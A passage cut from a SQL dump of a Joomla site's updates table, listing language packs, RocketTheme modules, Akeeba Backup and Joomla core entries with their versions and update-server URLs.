Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(12049,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(12050,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(12051,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(12052,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(12053,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(12054,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(12055,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(12056,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12057,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12058,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12059,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12060,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12061,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12062,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12063,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12064,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12065,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12066,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12067,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12068,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12069,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12070,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12071,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12072,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12073,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12074,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12075,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12076,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12077,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12078,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12079,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12080,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12081,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12082,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12083,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12084,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12085,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12086,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(12087,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(12088,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(12089,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(12090,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(12091,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(12092,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(12093,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12094,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12095,57,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12096,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12097,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12098,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12099,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12100,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12101,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(12102,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(12103,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(12104,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(12105,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(12106,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(12107,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(12108,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(12109,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(12110,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(12111,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12112,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12113,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12114,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12115,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12116,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12117,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12118,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12119,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12120,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12121,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12122,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12123,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12124,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12125,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12126,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12127,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12128,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12129,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12130,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12131,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12132,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12133,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12134,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12135,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12136,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12137,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12138,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12139,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12140,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12141,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12142,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(12143,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(12144,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(12145,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12146,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12147,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12148,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12149,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12150,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12151,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12152,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12153,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12154,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12155,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12156,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12157,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12158,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12159,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12160,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12161,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12162,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12163,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12164,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12165,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12166,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12167,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12168,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12169,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12170,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12171,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12172,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12173,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12174,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12175,3,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12176,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12177,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12178,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12179,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12180,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12181,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(12182,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(12183,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(12184,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(12185,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(12186,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(12187,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(12188,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(12189,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(12190,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(12191,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12192,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12193,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12194,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12195,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12196,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12197,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12198,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12199,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12200,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12201,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12202,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12203,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12204,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12205,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12206,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12207,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12208,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12209,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12210,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12211,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12212,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12213,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12214,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12215,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12216,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12217,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12218,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12219,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12220,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12221,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12222,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(12223,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(12224,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(12225,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(12226,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(12227,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(12228,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(12229,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12230,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12231,57,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12232,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12233,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12234,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12235,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12236,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12237,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(12238,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(12239,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(12240,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(12241,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(12242,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(12243,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(12244,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(12245,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(12246,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(12247,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12248,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12249,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12250,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12251,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12252,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12253,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12254,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12255,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12256,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12257,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12258,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12259,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12260,57,0,'Serbian 